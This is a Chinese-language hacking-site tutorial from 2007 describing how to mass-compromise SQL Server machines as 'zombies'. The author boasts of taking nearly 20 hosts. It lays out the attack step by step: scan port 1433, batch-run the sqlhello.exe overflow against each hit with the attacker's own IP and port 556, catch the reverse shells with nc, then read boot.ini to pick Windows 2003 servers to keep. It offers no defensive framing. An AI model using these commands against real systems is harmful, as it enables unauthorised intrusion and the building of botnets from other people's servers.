当前位置 :首页 ->数据库应用 ->SQL Server ->正文

SQL Server溢出猎捕肉鸡新方法

来源：黑客基地　 作者：Webmaster 时间：2007-04-23 点击： [收藏] [投稿]

我今天用这个方法拿到了近20台肉鸡。呵！！

　　要用到几个工具！！

　　nc.exe

　　sqlhello.exe

　　代理猎手！！

　　先用代理猎手扫1433端口!这个大家应该会吧。玩QB的时候可以说是……呵。

　　扫到后整理。导出。替换为溢出的格式！！比如我扫到了。

　　192.168.0.1:1433

　　溢出的格式就是： sqlhello.exe 192.168.0.1 1433　本机IP(公网的) 556

　　保存为bat文件。

　　先在公网的机子上监听一个端口　如556

　　现在运行那个bat文件!

　　呵！！看着有没有shell返回。

　　我试过不到两分钟就返回了一个。

　　这时候你先ctrl+c　停下那个bat 的运行。

　　查看一下。那个shell的系统再说！

　　type c:\boot.ini

　　如果是2003服务器版的。

　　呵。。

　　很快的就成为我们的肉鸡了！

如果您对本文有任何疑问或者建议，请到讨论区发表您的意见: >> 论坛入口 <<

上一篇：SQL Server 2005中的DDL触发器的实现下一篇：品味SQL Server 2005的几个新功能

【文章评论】【收藏本文】【推荐好友】【打印本文】【我要投稿】【论坛讨论】

更多相关文章

·精细讲述SQL Server数据库备份多种方法

·如何在SQL Server中构建并利用UDF表格

·使用T-SQL操作面试SQL Server开发人员

·课程讲解如何使用SQL Server校勘功能

·SQL Server从安装到建库为新手寻找捷径

·如何使用SQL Server数据库嵌套子查询

·问题解决:SQL Server 2005无法重新安装

·精细分析 SQL server服务器的内存配置

·如何获取SQL Server数据库元数据的方法

·用实例分析如何整理SQL Server输入数据

推荐文章

·SQL Server 2000企业版安装教程

·SQL Server中读取XML文件的简单做法

·SQL Server SA权限总结经典技术

·保护SQL Server：为安全性而安装

·怎么样获得应用程序所执行的SQL语句

·将Sql Server自增长字段的目前识别

·SQL2005 CompactEdition数据存储体

·sql server的几个函数要记录

精彩文章

·[SQL Server]怎么样得详细错误处理

·SQL Server 2005 Express附加(Attac

·[Sql server]阅兵：2005数据库列表

·SQL Server数据库性能的优化

· 深入探索MS SQL Server 2000网络连

·Windows 2003不太喜欢SQL Server200

·Sql server Mobile将“无处不在”

·Windows XP下安装SQL2000企业版

·SQL SERVER乐观锁定和悲观锁定使用

·SQL Server Maintenance plan 维护

·SQL Server Compact Edition RC1 发

·SQL Server 7.0 入门（八）

·SQL Server安全规划全攻略

·恢复误删数据（SQL Server 2000）－

·实例演示在SQL数据库中启用全文检索

·SQL server 数据库定时自动备份小技

·SQL Server编写存储过程小工具(一)

·SQL Server 2005中各个系统表的作用

·SQL Server中全角和半角字符的比较

·SQL Server 2005的XML数据修改语言

·SQL Server 2005使用基于行版本控制

·在SQL Server 2005中编辑SQL Server

·深度探讨SQL Server 2005 窗口函数

·怎么样把sql server 2000的用户表的

·SQL Server 数据库管理常用的SQL和T

·用SQL Server为Web浏览器提供图像（

Power by linux-cn.com 粤ICP备05006655号